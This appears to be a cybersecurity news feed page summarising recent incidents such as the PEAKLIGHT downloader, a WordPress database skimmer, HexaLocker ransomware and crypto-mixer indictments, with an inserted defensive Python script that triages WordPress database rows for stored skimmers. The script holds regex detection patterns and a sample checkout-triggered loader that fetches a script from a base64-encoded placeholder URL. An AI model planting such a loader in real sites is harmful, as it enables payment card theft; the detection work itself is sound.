This article provides a comprehensive overview of significant cybersecurity incidents and vulnerabilities reported recently, including outages, data breaches, and exploits targeting various platforms. Affected: Proton Mail, Ivanti VPN, Banshee, BayMark Health Services, Medusind, MirrorFace, STIIIZY, Samsung, GFI KerioControl, Mitel MiCollab, CrowdStrike, Akamai, Casio.

Keypoints:

Proton Mail experienced a worldwide outage due to a surge in database connections during infrastructure migration.…
Read More
PEAKLIGHT: Illuminating the Shadows
PEAKLIGHT is an obfuscated, memory-only PowerShell downloader identified by Mandiant that delivers malware-as-a-service infostealers. The infection chain starts with a Windows shortcut (LNK) file, which fetches a JavaScript dropper hosted on a CDN; the dropper runs the PEAKLIGHT PowerShell stage, which in turn downloads payloads including LummaC2, HijackLoader, and CryptBot. The campaign illustrates how attackers lean on legitimate infrastructure (a CDN) and built-in tooling (PowerShell) to deliver malware while evading detection.…
Read More
DoJ Indicts Three Russians for Operating Crypto Mixers Used in Cybercrime Laundering
Summary: The U.S. Department of Justice has indicted three Russian nationals for their roles in operating cryptocurrency mixing services Blender.io and Sinbad.io, which were allegedly used for laundering criminal funds. The mixers facilitated transactions that obscured the origins of funds linked to various cyber crimes, including ransomware and wire fraud.…
Read More
Cybersecurity News Review Week 2
This article discusses recent significant developments in cybersecurity, including vulnerabilities in Ivanti products, phishing scams, data exposure issues, and new government initiatives aimed at improving cyber resilience. Affected: Ivanti Connect Secure, CrowdStrike, Motorola ALPR, Gmail, WordPress, CISA, UK Government

Keypoints:

Ivanti disclosed two vulnerabilities affecting Connect Secure: CVE-2025-0282, a critical stack-based buffer overflow already exploited in the wild, and CVE-2025-0283, a high-severity privilege escalation.…
Read More
Russian nationals arrested by US, accused of running crypto mixers Blender and Sinbad
Summary: Three Russian nationals have been indicted for their involvement in operating cryptocurrency mixing services Blender.io and Sinbad.io, which were used to launder funds for cybercriminals, including North Korea’s Lazarus Group. The U.S. Department of Justice, in collaboration with international law enforcement, has taken significant steps to dismantle these platforms and hold the operators accountable.…
Read More
New Web3 attack exploits transaction simulations to steal crypto
Summary: Threat actors are using a tactic known as “transaction simulation spoofing” to steal cryptocurrency; one such attack netted 143.45 Ethereum, valued at around $460,000. Web3 wallets simulate a transaction and show the user its expected effect before signing. The attacker's contract returns a benign result during simulation, then changes its on-chain state before the user signs, so the transaction that actually executes drains the wallet. The attack turns a feature intended to protect users from fraudulent transactions into the lure itself.…
Read More
Stealthy Credit Card Skimmer Targets WordPress Checkout Pages via Database Injection
This article discusses a credit card skimmer targeting WordPress websites that injects malicious JavaScript into database entries, rather than into theme or plugin files, to steal payment details during checkout. Because the script lives in the database (a wp_options widget entry in the observed case), file-integrity and plugin scanners that only inspect the filesystem miss it. Affected: WordPress

Keypoints:

Credit card skimmer malware targets checkout pages on WordPress sites.…
Read More
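A skimmer stored in the database will not show up in a file scan, so the practical check is to export the rows that contain inline scripts and triage them for the traits such loaders share. The following is an added example, not code from the original article or from Sucuri; it assumes the default wp_ table prefix, and the sample rows are constructed to mimic a dump (the "skimmer" payload is a harmless placeholder that only carries the tell-tale traits).

```python
"""Heuristic triage of exported WordPress database rows for stored JavaScript skimmers."""
import re
from typing import Iterable, List, Tuple

# Export candidate rows from MySQL first. The query assumes the default "wp_"
# table prefix (an assumption; adjust it to your site's prefix).
EXPORT_QUERY = """
SELECT 'wp_options' AS tbl, option_name AS k, option_value AS v
  FROM wp_options WHERE option_value LIKE '%<script%'
UNION ALL
SELECT 'wp_posts', post_title, post_content
  FROM wp_posts WHERE post_content LIKE '%<script%';
"""

# Traits a database-resident checkout skimmer typically combines: an inline
# script, a reference to the checkout flow, and a loader hidden behind
# decoding or string-building tricks.
INDICATORS = {
    "script_tag":      re.compile(r"<script\b", re.I),
    "checkout_target": re.compile(r"checkout|wc-ajax|place-order|card[_-]?number", re.I),
    "base64_decode":   re.compile(r"\batob\s*\(", re.I),
    "eval":            re.compile(r"\beval\s*\(", re.I),
    "charcode_build":  re.compile(r"fromCharCode", re.I),
    "dynamic_loader":  re.compile(r"createElement\s*\(\s*['\"]script['\"]", re.I),
    "hex_escapes":     re.compile(r"(?:\\x[0-9a-f]{2}){4,}", re.I),
    "base64_blob":     re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
}

Row = Tuple[str, str, str]  # (table, key, value), as returned by EXPORT_QUERY

# Constructed sample rows standing in for an exported dump.
SAMPLE_ROWS: List[Row] = [
    ("wp_options", "siteurl", "https://shop.example"),
    ("wp_options", "widget_block",
     '<script>if(location.href.includes("checkout")){'
     'var s=document.createElement("script");'
     's.src=atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvYS5qcw==");'
     'document.head.appendChild(s)}</script>'),
    ("wp_posts", "post_content", "<p>Welcome to our store.</p>"),
    ("wp_posts", "post_content",
     "<script>eval(String.fromCharCode(100,111,99));</script>"),
]


def indicators_for(value: str) -> List[str]:
    """Names of every indicator pattern that matches the stored value."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def find_suspicious_entries(rows: Iterable[Row], min_indicators: int = 2) -> List[Tuple[str, str, List[str]]]:
    """Return (table, key, indicators) for rows with an inline script plus
    at least min_indicators traits overall. This is triage, not a verdict:
    legitimate page builders also emit inline scripts, so review each hit."""
    hits = []
    for table, key, value in rows:
        found = indicators_for(value or "")
        if "script_tag" in found and len(found) >= min_indicators:
            hits.append((table, key, found))
    return hits


if __name__ == "__main__":
    for table, key, found in find_suspicious_entries(SAMPLE_ROWS):
        print(f"{table}.{key}: {', '.join(found)}")
```

Feed the function the rows from EXPORT_QUERY (for example via `wp db query` or a CSV export) and inspect every hit by hand; a real finding should be removed from the database row itself, and the admin credentials and any vulnerable plugin that allowed the write should be addressed, or the entry will simply be reinjected.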
HexaLocker V2: Skuld Stealer Paving the Way prior to Encryption
HexaLocker V2 is an updated ransomware variant that adds a persistence mechanism, a data exfiltration stage built on Skuld Stealer, and revised encryption. It targets Windows systems and follows a double extortion model: data is stolen before files are encrypted. Affected: Windows systems

Keypoints:

HexaLocker was first discovered in mid-2024, with version 2 introducing significant updates.…
Read More
Fake CrowdStrike job offer emails target devs with crypto miners
Summary: CrowdStrike has identified a phishing campaign that impersonates the company, targeting job seekers with fake job offer emails to distribute a Monero cryptocurrency miner. The campaign tricks victims into downloading a malicious application disguised as an employee CRM tool.

Threat actor: Unknown. Victim: Job seekers.

Key point:

Phishing emails impersonate CrowdStrike, thanking candidates for applying for a developer position.…
Read More
The Feed 2025-01-09
This article explores various cyber threats, including voice phishing by the “Crypto Chameleon” group, exploitation of vulnerabilities in Kerio Control and Ivanti Connect Secure VPN, and North Korean hackers targeting cryptocurrency wallets through fake job interviews. The rise of ransomware among state-sponsored APT groups is also highlighted, indicating a troubling trend in modern cyber threats.…
Read More
Examining Redtail: Analyzing a Sophisticated Cryptomining Malware and its Advanced Tactics (Guest Diary) – SANS Internet Storm Center
This article discusses the redtail cryptocurrency mining malware, detailing its execution methods, the threat actors behind it, and the implications for defenders. The analysis, based on activity observed against an ISC honeypot, highlights the malware's ability to adapt and exploit newly disclosed vulnerabilities, and emphasizes the need for robust protective measures against such threats. Affected: Palo Alto Networks PAN-OS

Keypoints:

redtail is a cryptocurrency mining malware that stealthily installs itself on compromised systems.…
Read More
Zero Day Initiative – ZDI Threat Hunting 2024 Highlights: Trends and Challenges
The Zero Day Initiative Threat Hunting team had a productive 2024, identifying numerous zero-day vulnerabilities and their exploitation by threat actors. The team highlighted key achievements and ongoing challenges in vulnerability management, emphasizing the need for prompt and comprehensive patching solutions. Affected: Microsoft, Dropbox

Keypoints:

The ZDI Threat Hunting team identified multiple zero-day vulnerabilities exploited in the wild during 2024.…
Read More
PHP Servers Vulnerability Exploited to Inject PacketCrypt Cryptocurrency Miner
Researchers identified exploitation attempts, delivered as crafted URLs against a server-side vulnerability in PHP, that make the server download and execute a malicious executable. That first-stage binary, dr0p.exe, then downloads pkt1.exe, a PacketCrypt cryptocurrency miner. The campaign targets unpatched PHP servers and underlines the importance of applying security updates promptly.…
Read More
Cyber Briefing: January 7, 2025
This article discusses various recent cyber threats and incidents, including advanced backdoor attacks targeting AI models, data-stealing plugins, critical vulnerabilities in routers, and cyber espionage campaigns. It highlights the need for vigilance and updated security measures across multiple sectors. Affected Platform: Android, WordPress, Discord, various routers, telecommunications companies

Keypoints:

BARWM is a new backdoor attack method targeting deep learning models on mobile devices.…
Read More